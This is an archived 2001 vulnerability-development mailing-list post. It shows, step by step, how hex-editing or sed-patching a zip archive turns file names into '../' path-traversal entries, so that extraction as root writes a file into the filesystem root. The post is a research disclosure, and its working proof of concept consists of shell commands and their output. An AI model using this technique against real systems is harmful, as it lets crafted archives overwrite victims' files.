Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Valid characters on one o/s are invalid on another

From: <zen-parse () gmx net>
Date: Tue, 26 Jun 2001 06:06:16 +1200 (NZST)
it was possible to create a zip archive with some files in, hex edit the
archive and change the locations of some of these files, thus making it
extremely easy to transparently replace files on a system that the archive
is extracted on. This used to be a particularly nasty trick on amiga bbs's


its still possible.

tested with unzip (under rh 7.0)
this also apprently works with winzip and pkunzip

$ echo "@echo haxed" >ddsddsddsddsddsddsautoexec.bta
$ zip file ddsddsddsddsddsddsautoexec.bta
$ unzip -t file.zip
Archive:  file.zip
    testing: ddsddsddsddsddsddsautoexec.bta   OK
No errors detected in compressed data of file.zip.
$ sed 's,dds,../,g' <file.zip newfile.zip
$ unzip -t newfile.zip
Archive:  newfile.zip
    testing: ../../../../../../autoexec.bta   OK
No errors detected in compressed data of newfile.zip.
$ unzip newfile.zip
Archive:  newfile.zip
error:  cannot create ../../../../../../autoexec.bta
$ su
Password:
# unzip newfile.zip
Archive:  newfile.zip
 extracting: ../../../../../../autoexec.bta
# ls -al /autoexec.bta
-rw-r--r--    1 root     root           12 Jun 26 06:00 /autoexec.bta

 -- zen-parse
application
Previous By Date Next
Previous By Thread Next

Current thread: